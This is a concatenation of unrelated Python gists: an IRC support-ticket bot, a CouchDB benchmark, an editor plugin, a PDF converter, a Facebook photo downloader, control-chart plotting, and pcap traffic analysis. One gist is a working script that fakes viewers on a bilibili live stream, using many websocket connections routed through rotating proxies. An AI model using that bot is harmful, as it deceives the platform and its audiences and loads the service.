bot.msg(config.channel, get_ticket_stats())
@willie.module.rule(r'(?i)done (\d+)$')
@willie.module.commands('done')
def mark_ticket_done(bot, trigger):
if trigger.sender == config.channel and trigger.nick.lower() in config.supporters:
supporter_as_online(bot, trigger.nick)
ticket = int(trigger.group(2))
target = get_nick_by_ticket(ticket)
if close_ticket(ticket):
bot.msg(config.channel, get_ticket_stats())
bot.msg(target, config.msg_after_support);
def supporter_as_online(bot, nick):
"""
Marks a supporter as online
"""
if nick.lower() in config.supporters and not nick.lower() in available_supporters:
available_supporters[nick.lower()] = OnlineSupporter(nick)
bot.msg(config.channel, "%s just logged in!" % nick)
for k in open_tickets.copy():
if open_tickets[k].status == STATUS_WAITING:
bot.msg(open_tickets[k].nickname, config.msg_supporter_available)
open_tickets[k].touch()
bot.msg(config.channel, get_ticket_stats())
@willie.module.commands('me')
def supporter_joins(bot, trigger):
if trigger.group(2) == 'on':
supporter_as_online(bot, trigger.nick)
elif trigger.group(2) == 'off':
if supporter_quit(trigger.nick):
bot.msg(config.channel, "Allright %s, you've done enough for today!" % trigger.nick)
def supporter_quit(nick):
"""
Removes a supporter from the list of available supporters.
Returns false if that supporter was not on the list.
"""
if available_supporters.has_key(nick.lower()):
available_supporters.pop(nick.lower())
return True
return False
@willie.module.interval(10)
def check_heartbeat(bot):
    # I. Take care of supporters who have gone away
for k in available_supporters.copy():
if available_supporters[k].get_idletime() > config.supporter_timeout:
if supporter_quit(k):
bot.msg(config.channel, '%s is not available for support anymore.' % k)
        elif available_supporters[k].get_idletime() > config.supporter_idle and available_supporters[k].may_askifalive():
bot.write(('NOTICE', k), '%s, are you still alive?' % k)
available_supporters[k].lastaskalivetime = datetime.datetime.now()
    # II. Take care of tickets that have gone idle
for k in open_tickets.copy():
if open_tickets[k].get_idletime() > config.ticket_timeout:
bot.msg(open_tickets[k].nickname, config.msg_idle_closed)
if close_ticket(k, False):
bot.msg(config.channel, "Closed idle ticket #%d." % k)
elif open_tickets[k].get_idletime() > config.ticket_idle:
open_tickets[k].status = STATUS_IDLE
def setup(bot):
for attr, value in config.__dict__.iteritems():
if not attr.startswith('__'):
if bot.config.has_option('supportbot', attr):
valueToUse = getattr(bot.config.supportbot, attr);
print type(value)
if isinstance(value, int):
valueToUse = int(valueToUse)
elif isinstance(value, list):
valueToUse = valueToUse.lower().split(',')
setattr(config, attr, valueToUse)
else:
bot.debug('SupportCenter', '%s is missing, will use "%s"' % (attr, value), 'warning')
def configure(botconfig):
if botconfig.option("Configure the Support Center"):
botconfig.add_section('supportbot')
botconfig.interactive_add('supportbot', 'channel', 'In which channel will the supporters work? (The bot must be in that channel!)', config.channel)
botconfig.add_list('supportbot', 'supporters', 'Enter all supporters!', 'Nickname:')
botconfig.interactive_add('supportbot', 'ticket_idle', 'After how many seconds should a ticket be marked as inactive?', config.ticket_idle)
botconfig.interactive_add('supportbot', 'ticket_timeout', 'After how many seconds of inactivity should a ticket be deleted?', config.ticket_timeout)
botconfig.interactive_add('supportbot', 'supporter_idle', 'After how many seconds should a supporter be asked if he is alive?', config.supporter_idle)
botconfig.interactive_add('supportbot', 'supporter_timeout', 'After how many seconds of inactivity should a supporter be marked as offline?', config.supporter_timeout)
botconfig.interactive_add('supportbot', 'supporter_askifaliveinterval', 'How often should an idle supporter be asked if he is alive? (Interval in seconds)', config.supporter_askifaliveinterval)
def mirc_format(s):
"""
Replaces mIRC-Codes (for example ^K for Strg+K for colors) with the corresponding chars
"""
s = s.replace("^B", chr(0x02))
s = s.replace("^K", chr(0x03))
s = s.replace("^R", chr(0x0f))
return s;
```
#### File: hard-gists/672229/snippet.py
```python
from datetime import datetime
# See https://gist.github.com/672279/
from inoi.util.random import sequential_id, monotonic_id
import httplib2
import json
import random
import time
import sys
import uuid
id_makers = {
'random': lambda: uuid.uuid4().hex,
'monotonic': monotonic_id,
'sequential': sequential_id,
}
database = sys.argv[1]
make_id = id_makers[sys.argv[2]]
baseurl = 'http://localhost:5984/%s' % database
bulk_size = 2000
total_docs = 2000000
http = httplib2.Http()
def send_bulk(bulk):
resp, content = http.request(
baseurl + '/_bulk_docs',
method='POST',
body=json.dumps({'docs': bulk}),
)
def make_bulk(size):
return [
{
'_id': make_id(),
'timestamp': datetime.now().isoformat(),
'data': random.random() * 2000,
}
for i in xrange(size)
]
def main():
max_bulk_rate = (-1, float('-inf'))
min_bulk_rate = (-1, float('inf'))
loop = 0
def print_stats():
end = time.time()
total_rate = (loop * bulk_size) / (end - start)
print '== loop %d ============================' % loop
print 'peak min: in loop %d, %.2f docs/sec' % min_bulk_rate
print 'peak max: in loop %d, %.2f docs/sec' % max_bulk_rate
print 'current: %.2f docs/sec' % bulk_rate
print 'total: %.2f docs/sec' % total_rate
start = time.time()
while True:
loop += 1
bulk_start = time.time()
bulk = make_bulk(bulk_size)
send_bulk(bulk)
bulk_end = time.time()
bulk_rate = bulk_size / (bulk_end - bulk_start)
if bulk_rate > max_bulk_rate[1]:
max_bulk_rate = (loop, bulk_rate)
if bulk_rate < min_bulk_rate[1]:
min_bulk_rate = (loop, bulk_rate)
if loop % 20 == 0:
print_stats()
if loop * bulk_size >= total_docs:
break
print ''
print 'FINISHED:'
print_stats()
if __name__ == '__main__':
main()
# python couchdb_test.py test_sequential_id sequential
#
# FINISHED:
# == loop 1000 ============================
# peak min: in loop 5, 3057.95 docs/sec
# peak max: in loop 8, 7904.39 docs/sec
# current: 7449.51 docs/sec
# total: 7294.78 docs/sec
#
# database size on disk: 648548454 bytes = 0.6 GB
# python couchdb_test.py test_monotonic_id monotonic
#
# FINISHED:
# == loop 1000 ============================
# peak min: in loop 195, 1911.73 docs/sec
# peak max: in loop 161, 7703.18 docs/sec
# current: 7511.34 docs/sec
# total: 7353.81 docs/sec
#
# database size on disk: 611405926 = 0.6 GB
# python couchdb_test.py test_random_id random
#
# FINISHED:
# == loop 1000 ============================
# peak min: in loop 889, 535.66 docs/sec
# peak max: in loop 1, 5473.21 docs/sec
# current: 1685.13 docs/sec
# total: 2133.34 docs/sec
#
# database size on disk: 4330426472 = 4.0 GB
```
#### File: hard-gists/6808772/snippet.py
```python
import sublime, sublime_plugin
class Copy_on_select(sublime_plugin.EventListener):
def on_selection_modified(self, view):
for region in view.sel():
if not region.empty():
print(view.substr(region))
view.run_command('copy')
```
#### File: hard-gists/6843565/snippet.py
```python
from __future__ import division, print_function
import Image
class Wallmask(object):
def __init__(self):
self.load_wallmask("Maps/ctf_dirtbowl_v2.png")
self.name = "ctf_dirtbowl_v2"
def load_wallmask(self, name):
print("---LOADING WALLMASK---")
image = Image.open(name)
for key, value in image.text.items():
if key == "Gang Garrison 2 Level Data":
text = value
break
text = text[text.find("{WALKMASK}\n")+len("{WALKMASK}\n"):text.find("\n{END WALKMASK}")]
index = text.find("\n")
self.width = int(text[:index])
text = text[index+1:]
index = text.find("\n")
self.height = int(text[:index])
text = text[index+1:]
self.mask = [[False for j in range(self.height)] for i in range(self.width)]
self.uncompress_wallmask_data(text)
large_mask = [[False for j in range(len(self.mask[0])*6)] for i in range(len(self.mask)*6)]
for i in range(len(self.mask)*6):
for j in range(len(self.mask[0])*6 - 7):
large_mask[i][j] = self.mask[int(i/6)][int(j/6)]
self.mask = large_mask
self.width = len(self.mask)
self.height = len(self.mask[0])
def uncompress_wallmask_data(self, data):
bitmask = 0x1
index = len(data)-1
value = ord(data[index]) - 32
for i in range(len(data)*6 - self.width*self.height):
bitmask *= 2
for y in range(self.height-1, -1, -1):
for x in range(self.width-1, -1, -1):
if bitmask == 64:
index -= 1
bitmask = 0x1
value = ord(data[index]) - 32
if value & bitmask:
self.mask[x][y] = True
bitmask *= 2
def print_wallmask(self):
n_image = Image.new("L", (self.width, self.height))
for x in range(self.width):
for y in range(self.height):
if self.mask[x][y]:
n_image.putpixel((x, y), 0)
else:
n_image.putpixel((x, y), 255)
n_image.save("output.png")
```
#### File: hard-gists/691e97ce22f7cd43d6a9d54305344587/snippet.py
```python
from PIL import Image as Img
from wand.image import Image
import uuid
import numpy as np
import glob
import os
import sys
def convert(filepdf):
#used to generate temp file name. so we will not duplicate or replace anything
uuid_set = str(uuid.uuid4().fields[-1])[:5]
try:
#now lets convert the PDF to Image
#this is good resolution As far as I know
with Image(filename=filepdf, resolution=200) as img:
#keep good quality
img.compression_quality = 80
#save it to tmp name
img.save(filename="temp/temp%s.jpg" % uuid_set)
except Exception, err:
#always keep track the error until the code has been clean
#print err
return False
else:
"""
We finally success to convert pdf to image.
but image is not join by it self when we convert pdf files to image.
now we need to merge all file
"""
pathsave = []
try:
#search all image in temp path. file name ends with uuid_set value
list_im = glob.glob("temp/temp%s*.jpg" % uuid_set)
list_im.sort() #sort the file before joining it
imgs = [Img.open(i) for i in list_im]
#now lets Combine several images vertically with Python
min_shape = sorted([(np.sum(i.size), i.size) for i in imgs])[0][1]
imgs_comb = np.vstack(
(np.asarray(i.resize(min_shape)) for i in imgs))
# for horizontally change the vstack to hstack
imgs_comb = Img.fromarray(imgs_comb)
pathsave = "MyPdf%s.jpg" % uuid_set
#now save the image
imgs_comb.save(pathsave)
#and then remove all temp image
for i in list_im:
os.remove(i)
except Exception, err:
#print err
return False
return pathsave
if __name__ == "__main__":
arg = sys.argv[1]
result = convert(arg)
if result:
print "[*] Succces convert %s and save it to %s" % (arg, result)
else:
print "[!] Whoops. something wrong dude. enable err var to track it"
"""
===========================================
Running Test:
python testing-pdf.py zz.pdf
[*] Succces convert zz.pdf and save it to Resume63245.jpg
===========================================
"""
#well I hope this will be useful for you & others.
```
#### File: hard-gists/6b2273d7e332f29193d0/snippet.py
```python
import sys
import time
import getopt
from multiprocessing import Process
from websocket import create_connection, WebSocketConnectionClosedException, WebSocketProxyException, WebSocketException
import random
import re
import traceback
import socket
global proxy_list
#----------------------------------------------------------------------
def fake_connector(cid, is_proxy = False):
""""""
try:
if is_proxy:
proxy_server = random.choice(proxy_list)
host, port = proxy_server.split(':')
ws = create_connection('ws://livecmt.bilibili.com:88/{cid}'.format(cid = cid), http_proxy_host = host, http_proxy_port = int(port))
else:
ws = create_connection('ws://livecmt.bilibili.com:88/{cid}'.format(cid = cid))
while 1:
time.sleep(5)
a = ws.recv()
except (WebSocketProxyException, socket.error, TypeError): #proxy server died
#/usr/local/lib/python2.7/site-packages/websocket/_http.py L186 WTF????
print(proxy_server + ' died!')
try:
proxy_list.remove(proxy_server)
except Exception, err:
print(traceback.format_exc())
except (WebSocketConnectionClosedException, WebSocketException):
return -1
except Exception, err:
print(traceback.format_exc())
return 0
finally:
return
#----------------------------------------------------------------------
def main(cid, thread_number, is_proxy = False):
""""""
#Get a list of threads
process_list = [Process(target=fake_connector, args=((cid, is_proxy, ))) for i in xrange(int(thread_number))] #Queue? Your ass
[i.start() for i in process_list] #ignite every one
try:
while 1:
alive_list = [i.is_alive() for i in process_list]
print('Active thread: ' + str(len(alive_list)))
death_position_list = [i for i, x in enumerate(alive_list) if x == False]
if len(death_position_list) > 0: #someone died
print('Some died, adding {COUNT} new threads'.format(COUNT = len(death_position_list)))
for i in death_position_list:
del process_list[i] #remove body
process_list.append(Process(target=fake_connector, args=((cid, is_proxy, ))))
process_list[-1].start() #ignite
time.sleep(3)
except Exception as e:
print(e)
for i in process_list:
try:
i.terminate() #ensure safe exit
except:
pass
exit()
#----------------------------------------------------------------------
def proxy_file_to_list(proxy_file):
"""fileIO->list
file:
192.168.3.11:80
172.16.58.3:9000
192.168.127.12:8090
172.16.31.10:8118
172.16.58.3:8888
list:
['192.168.3.11:80', '172.16.58.3:9000', '192.168.127.12:8090',...
"""
final_list = []
pattern = re.compile(r'\d+.\d+.\d+.\d+:\d+') #172.16.31.10:8123
with open(proxy_file, 'r') as file_this:
final_list = [line.strip() for line in file_this if pattern.match(line)]
return final_list
#----------------------------------------------------------------------
def usage():
""""""
print('''Use as:
-c: cid, room number
-t: thread number
-p: proxy file
Press Ctrl+C to exit.
''')
if __name__=='__main__':
is_proxy = False
argv_list = sys.argv[1:]
try:
opts, args = getopt.getopt(argv_list, "hc:t:p:",
['help', "cid=", 'thread_number=', 'proxy_file='])
except getopt.GetoptError:
usage()
exit()
for o, a in opts:
if o in ('-h', '--help'):
usage()
exit()
if o in ('-c', '--cid'):
cid = a
if o in ('-t', '--thread_number'):
thread_number = int(a)
if o in ('-p', '--proxy_file'):
is_proxy = True
proxy_file = a
if is_proxy:
proxy_list = proxy_file_to_list(proxy_file)
print('Getting room {cid} {thread_number} viewers...'.format(cid = cid, thread_number = thread_number))
main(cid, thread_number, is_proxy)
```
#### File: hard-gists/6bb9ddb5d904b7275c62/snippet.py
```python
import commands
import json
import os
import sys
import urllib
import dateutil.parser
import magic
import requests
########################### CUSTOMIZE THIS ###########################
page_id = "567045406742962"
access_token = "app_id|app_secret" # see https://developers.facebook.com/docs/facebook-login/access-tokens#apptokens
dest = os.path.expanduser("~/img/sns/apink-official-facebook")
website_title = "apink-official-facebook"
######################################################################
if not os.path.exists(dest):
os.makedirs(dest)
# read last update time, if it is available
last_update_record = dest + "/last_update_timestamp"
if os.path.exists(last_update_record):
f = open(last_update_record, "r")
last_update_timestamp = f.readline()
f.close()
last_update_time = dateutil.parser.parse(last_update_timestamp)
else:
last_update_time = dateutil.parser.parse("1970-01-01T00:00+00:00")
# this function makes an API call with only an access_token (which
# could be just app-id|app-secret)
def fb_public_call(endpoint, params, access_token):
params["access_token"] = access_token
response = requests.get("https://graph.facebook.com/" + endpoint,
params=params)
return response.json()
# this function downloads a photo
# return codes are defined below
SUCCESS = 0
FAILED_DOWNLOAD = 1
UNRECOGNIZED_MIME = 2
OLD_PHOTO = 255 # photo older than last update time
def handle_photo(photo, album_id):
# print information
photo_id = photo["id"]
time = dateutil.parser.parse(photo["created_time"])
if time < last_update_time:
return OLD_PHOTO
time_print = time.strftime("%b %d, %Y")
time_full = time.strftime("%Y%m%d%H%M%S")
original_image = photo["images"][0]
height = original_image["height"]
width = original_image["width"]
format_string = "date: %s id: %s size: %sx%s"
print format_string % (time_print, photo_id, width,
height)
# download file
source_uri = original_image["source"]
filename = time_full + "-" + website_title + "-" + \
album_id + "-" + photo_id
filepath = dest + "/" + filename
urllib.urlretrieve(source_uri, filepath)
# identify mime type and attach extension
if os.path.exists(filepath):
mime = magic.from_file(filepath, mime=True)
if mime == "image/gif":
newfilepath = filepath + ".gif"
elif mime == "image/jpeg":
newfilepath = filepath + ".jpg"
elif mime == "image/png":
newfilepath = filepath + ".png"
else:
err = filepath + ": error: " + \
"unrecgonized image type\n"
sys.stderr.write(err)
return UNRECOGNIZED_MIME
os.rename(filepath, newfilepath)
return SUCCESS
else:
# donwload failed for whatever reason
err = "error: " + filename + " failed to " + \
"downloaded from " + source_uri + "\n"
sys.stderr.write(err)
return FAILED_DOWNLOAD
# this function handles an album, i.e., download newly added photos
# since the last update
def handle_album(album):
# print album info
album_id = album["id"]
format_string = "downloading album \"%s\" " + \
"(album id: %s; photo count: %s)"
print format_string % (album["name"], album_id,
album["count"])
print "-" * 80
# retrieve photos in the album
photos_response = fb_public_call(album["id"] + "/photos",
params, access_token)
while True:
for photo in photos_response["data"]:
if handle_photo(photo, album_id) == OLD_PHOTO:
# already encountered old photo in this album
# no need to look further into the past
print
return
if "next" in photos_response["paging"]:
next_uri = photos_response["paging"]["next"]
photos_response = requests.get(next_uri).json()
else:
break
print
params = {}
# retrieve albums
albums_response = fb_public_call(page_id + "/albums", params,
access_token);
while True:
for album in albums_response["data"]:
handle_album(album)
if "next" in albums_response["paging"]:
next_uri = albums_response["paging"]["next"]
albums_response = requests.get(next_uri).json()
else:
break
# update feature yet to be implemented
# create a file "last_update_timestamp" for future use
f = open(last_update_record, "w")
f.write(commands.getoutput("date -u --iso-8601=seconds"))
f.close()
```
#### File: hard-gists/6cd16631253eed21f37f/snippet.py
```python
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
from pylab import *
from math import *
import sys
import time as py_time
import datetime as py_datetime
#from control_chart_data_parser import *
from cccp_const import *
from cccp_ex import *
from cccp_types import *
def xtend( x ):
ar = []
for t in r.sample_times:
ar.append(x)
return ar
def rside_txt( xmax, val, txt, loc=None ):
if loc == None:
loc = val
text( xmax*1.02, loc, txt%val )
version = 1.0
script_name = sys.argv[0]
valid_machines = [ "qranky_1", "qranky_2", "igor_1", "example" ]
help_str = """
About:
CCCP is Control Charts in Python
%s, Version %3.1f
Quarq Technology / SRAM LLC
<NAME>
Licensed under GPL V2
Example: %s -f=qranky_1
Options:
--help ( -? ) Prints this message.
--machine= ( -m= ) Specify test machine from following:
%s
--file ( -f= ) Specify CSV file to import from.
--verbose ( -v ) More verbose output.
--license ( -l ) Prints GPL license notification.
""" % ( script_name, version, script_name, valid_machines )
class Control_Chart:
def __init__( self ):
self.verbose = False
self.outpath = "outputs/"
self.time_ran = py_time.localtime()
self.infile = None
self.tol = 0.05 # Sets axis on mean plot
# Given a data set, determine which samples are in violation
# of the common Western Electric control chart rules
def western_electric_rules( self, r ):
# Points outside the +/- 3 sigma control limits
def get_3s_violators( r ):
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r
lcl = r.mean - A2r
return get_m_of_n_runs( r.sample_means, 1, 1, lcl, ucl )
## Two out of three consecutive points outside
## the +/- 2 sigma limits
def get_2s_runs( r ):
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r*2.0/3.0
lcl = r.mean - A2r*2.0/3.0
return get_m_of_n_runs( r.sample_means, 2, 3, lcl, ucl )
## Four out of five consecutive points outside
## the +/- 1 sigma limits
def get_1s_runs( r ):
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r/3.0
lcl = r.mean - A2r/3.0
return get_m_of_n_runs( r.sample_means, 4, 5, lcl, ucl )
## Eight consecutive points on the same side
## of the center line.
def get_mean_runs( r ):
ucl = r.mean
lcl = r.mean
return get_m_of_n_runs( r.sample_means, 8, 8, lcl, ucl )
def get_m_of_n_runs( data, m, n, lcl, ucl ):
t, s = [], []
for i in range(n,len(data)+1,1):
set = data[i-n:i]
if n_of_set( set, m, 'gt', ucl ) or \
n_of_set( set, m, 'lt', lcl ):
t.append( r.sample_times[i-n:i] )
s.append( data[i-n:i] )
return t, s
# Checks if 'n' items in a set are greater than 'lim', etc.
# 'expr' parameter specifies conditional relation of 'set items
# to 'lim'
def n_of_set( set, n, expr = 'gt', lim = 0.0 ):
ct = 0
for i in set:
if expr == 'gt':
if i > lim:
ct += 1
elif expr == 'lt':
if i < lim:
ct += 1
elif expr == 'gte':
if i <= lim:
ct += 1
elif expr == 'lte':
if i <= lim:
ct += 1
if ct >= n:
return True
else:
return False
if False: # Test for WE rules function
data = [ 0.0, 0.0, 2.0, 3.0, 3.0, 2.0, 2.0, 3.0, \
3.0, 2.0, 2.0, 2.0, 3.0, 7.0 ]
m = 3
for i in range(m,len(data)+1,1):
set = data[i-m:i]
print set,
if n_of_set( set, n=2, expr='gt', lim=2.5 ):
print "!"
else:
print
## Get all of the violating series..
out_of_ctrl_samples = []
out_of_ctrl_times = []
if True:
for f in [ get_3s_violators, get_mean_runs, \
get_2s_runs, get_1s_runs ]:
t, s = f( r )
out_of_ctrl_times.append(t)
out_of_ctrl_samples.append(s)
print "Out of control points detected:"
print f
print s, "@", t
print
return out_of_ctrl_times, out_of_ctrl_samples
def plot_means( self, r ):
r.update_all()
# Use mean of sample ranges
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r
lcl = r.mean - A2r
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
if True:
plot( r.sample_times, xtend(r.mean + A2r/3.0), linewidth=1.0, c='b', alpha=0.25 )
plot( r.sample_times, xtend(r.mean - A2r/3.0), linewidth=1.0, c='b', alpha=0.25 )
plot( r.sample_times, xtend(r.mean + A2r*2.0/3.0), linewidth=1.0, c='y', alpha=0.25 )
plot( r.sample_times, xtend(r.mean - A2r*2.0/3.0), linewidth=1.0, c='y', alpha=0.25 )
plot( r.sample_times, xtend(r.mean), linewidth=2.0, c='b' )
plot( r.sample_times, r.sample_means, marker='^', c='k')
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*(1-self.tol),ucl*(1+self.tol)])
rside_txt(tmax, ucl, "UCL=%5.3f")
rside_txt(tmax, lcl, "LCL=%5.3f")
rside_txt( tmax, r.mean, "Nominal=%5.3f" )
span = ((ucl-lcl)/r.mean )*100.0
rside_txt( tmax, span, "Span=%5.3f%%", lcl*(1-self.tol))
#xlabel('Time')
ylabel('Means', fontsize=18)
grid(False)
def plot_western_electric_overlay( self ):
# Find points that are out of control based on rules and
# overlay these points with big red blobs
out_of_ctrl_times, out_of_ctrl_samples = \
self.western_electric_rules( r )
if self.verbose and len(out_of_ctrl_samples) :
print "Overlaying out-of-control points.."
for rule in range(0, len(out_of_ctrl_samples)):
t, s = out_of_ctrl_times[rule], out_of_ctrl_samples[rule]
if len(s) > 0:
scatter(t, s, s=250, c='r', alpha=0.5)
def plot_ranges( self, r ):
r.update_all()
ss = len(r.samples[0].measurements)
ucl = r.range * const_D4[ss]
lcl = r.range * const_D3[ss]
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(r.range), linewidth=2.0, c='b' )
plot( r.sample_times, r.sample_ranges, marker='^', c='k')
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*0.66, ucl*1.25])
rside_txt( tmax, ucl, "UCL=%5.3f" )
rside_txt( tmax, lcl, "LCL=%5.3f" )
rside_txt( tmax, r.range, "Nominal=%5.3f" )
#xlabel('Time')
ylabel('Ranges', fontsize=18)
grid(True)
# Achtung: Need to figure out how to properly compute stdevs
# and what factors to use and what they do...
def plot_stdevs( self, r ):
r.update_all()
ss = len(r.samples[0].measurements)
ucl = r.stdev * const_B4[ss]
lcl = r.stdev * const_B3[ss]
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(r.stdev), linewidth=2.0, c='b' )
plot( r.sample_times, r.sample_stdevs, marker='^', c='k')
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*0.666, ucl*1.25])
rside_txt( tmax, ucl, "UCL=%5.3f" )
rside_txt( tmax, lcl, "LCL=%5.3f")
rside_txt( tmax, r.stdev, "Nominal=%5.3f" )
grid(True)
def plot_cusum( self, r, target_mean, k=0.5, h=4 ):
r.update_all()
# Control limits
ss = len(r.samples[0].measurements)
# Adjust sample stdev to estimated population stdev
sigma = r.stdev * const_A3[ss] / 3.0
ucl = h*sigma
lcl = -1.0 * ucl
# Compute cumulative sums
su, sl = [0], [0]
for x in r.sample_means:
su.append( max( 0, x - target_mean - k*sigma + su[-1] ) )
sl.append( min( 0, x - target_mean + k*sigma + sl [-1]) )
# Trim the first zeros off..
su = su[1:]
sl = sl[1:]
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, su, marker='^', c='k' )
plot( r.sample_times, sl, marker='^', c='k' )
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*1.1, ucl*1.1])
rside_txt( tmax, ucl, "UCL=%5.3f" )
rside_txt( tmax, lcl, "LCL=%5.3f" )
rside_txt( tmax, target_mean, "Target=%5.3f")
grid(True)
def plot_p_attr( self, r ):
r.update_all()
#r.pretty_print(True,False)
# Control limits
ss = len(r.samples[0].measurements)
mean_p = r.get_mean_proportion_defective()
#print "--> mean_p:", mean_p
# Compute upper and lower control lims
ucl, lcl = [], []
for s in r.samples:
s.update_all()
n = len( s.measurements ) #Sample size
q = 3*sqrt( mean_p*(1-mean_p)/n )
ucl.append( mean_p + q )
lcl.append( max( 0, mean_p - q ) )
plot( r.sample_times, ucl, linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, lcl, linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(mean_p), linewidth=2.0, c='b' )
plot( r.sample_times, r.defect_proportions, marker='^', c='k',
linewidth=2.0)
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#ymin = min(lcl)*0.8
ymin = 0
#([tmin, tmax, ymin, max(ucl)*1.2])
rside_txt( tmax, mean_p, "Mean=%5.3f")
text( tmax*1.02, ucl[-1], "UCL" )
text( tmax*1.02,lcl[-1], "LCL" )
grid(True)
def save_plots( self, stitle ):
savefig("%s%s_%s.png"% (self.outpath, stitle, \
py_time.strftime("%Y-%m-%d_%H-%M-%S", self.time_ran) ) )
savefig("%scurrent_%s.png"% (self.outpath, stitle) )
def make_xbar_plot( self, r, stitle, p2='range', cusum=False ):
figure(1, figsize=(18, 8), dpi=80, facecolor='w', edgecolor='k')
suptitle(stitle, fontsize=20)
#years = YearLocator() # every year
#months = MonthLocator() # every month
#yearsFmt = DateFormatter('%Y')
if cusum:
subplot(311)
else:
subplot(211)
title('Generated %s' % py_time.strftime("%Y/%m/%d, %H:%M", \
self.time_ran) )
self.plot_means(r)
#self.plot_western_electric_overlay()
if cusum:
subplot(312)
else:
subplot(212)
if p2 in ('r', 'range'):
self.plot_ranges(r)
ylabel('Std. Devs.', fontsize=18)
elif p2 in ('s', 'stdev'):
self.plot_stdevs(r)
ylabel('Std. Devs.', fontsize=18)
if cusum:
subplot(313)
self.plot_cusum(r, 10.0, k=0.5, h=4 )
ylabel('CUSUM', fontsize=18)
xlabel('Time', fontsize=18)
self.save_plots(stitle)
if self.verbose:
show()
def make_attr_chart( self, r, stitle ):
figure(1, figsize=(18, 8), dpi=80, facecolor='w', edgecolor='k')
suptitle(stitle, fontsize=20)
subplot(111)
title('Generated %s' % py_time.strftime("%Y/%m/%d, %H:%M", \
self.time_ran) )
self.plot_p_attr(r)
xlabel('Time', fontsize=18)
ylabel('Proportion', fontsize=18)
self.save_plots(stitle)
if self.verbose:
show()
#_______________________ M A I N __ P R O G R A M _____________________#
if __name__=="__main__":
cc = Control_Chart()
# Parse command-line arguements
for arg in sys.argv:
if arg in ['-?', '-h', '-help', '--help']:
print help_str
exit(0)
if arg in [ "-l", "--license"]:
print license_str
exit(0)
if arg in ["-v", "--verbose"]:
cc.verbose = True
if arg.startswith("-m=") or arg.startswith("--machine="):
cc.machine_name = arg.rsplit( "=", 1 )[1]
if not cc.machine_name in valid_machines:
print "Please specify one of the following:", \
valid_machines
exit(-1)
if arg.startswith("-f=") or arg.startswith("--file="):
cc.infile = arg.rsplit( "=", 1 )[1]
# x-bar/R chart example from Foster Text
if False:
r = import_time_value_arrays( times=[], \
values=example_data_foster_18_11, sample_size=4 )
r.pretty_print(True, True)
t = 'Figure 11-8 from Foster Text'
cc.make_xbar_plot(r, t, p2='range')
# p chart example from Foster Text
elif False:
r = get_example_data_foster_12_1()
t = 'Example 12-1 from Foster Text'
cc.make_attr_chart( r, stitle=t )
# Example of calibration drift and CUSUM chart
elif True:
d = get_calibration_example_data()
r = import_time_value_arrays( times=[], \
values=d, sample_size=4 )
t = 'Calibration Control Chart'
cc.make_xbar_plot(r, t, p2='range', cusum=True )
else:
if cc.infile == None:
print "Please specify a data file."
exit(0)
else:
t, m = import_csv_to_arrays( cc.infile )
r = import_time_value_arrays( t, m, sample_size=4 )
t = ('Control Chart')
cc.make_attr_chart( r, stitle=t )
```
#### File: hard-gists/6d459a8c2ae945808d69/snippet.py
```python
import dpkt
import humanfriendly
import nids
import pandas as pd
import socket
import sys
conv = {}
ip_to_domain = {}
end_states = (nids.NIDS_CLOSE, nids.NIDS_TIMEOUT, nids.NIDS_RESET)
def handle_tcp_stream(tcp):
ports = [80, 443]
if tcp.addr[1][1] not in ports:
return
global conv
if tcp.nids_state == nids.NIDS_JUST_EST:
tcp.client.collect = 1
tcp.server.collect = 1
elif tcp.nids_state == nids.NIDS_DATA:
tcp.discard(0)
elif tcp.nids_state in end_states:
ip = tcp.addr[1][0]
conv.setdefault(ip, 0)
conv[ip] += len(tcp.client.data[:tcp.client.count]) + len(tcp.server.data[:tcp.server.count])
def udp_callback(addrs, payload, pkt):
if addrs[0][1] != 53:
return
dns = dpkt.dns.DNS(payload)
global ip_to_domain
for q in dns.qd:
domain = q.name
for a in dns.an:
try:
ip_to_domain[socket.inet_ntoa(a.ip)] = domain
except AttributeError:
pass
return
def extract(pcap_file):
nids.param("tcp_workarounds", 1)
nids.param("scan_num_hosts", 0) # disable portscan detection
nids.chksum_ctl([('0.0.0.0/0', False)]) # disable checksumming
nids.param("filename", pcap_file)
nids.init()
nids.register_tcp(handle_tcp_stream)
nids.register_udp(udp_callback)
try:
nids.run()
except Exception, e:
print "Exception ", pcap_file + " ", e
data = []
columns = ('name', 'bytes', 'human_bytes')
for ip, byte in conv.iteritems():
name = ip_to_domain[ip] if ip in ip_to_domain else ip
data.append([name, byte, humanfriendly.format_size(byte)])
df = pd.DataFrame(data, columns=columns)
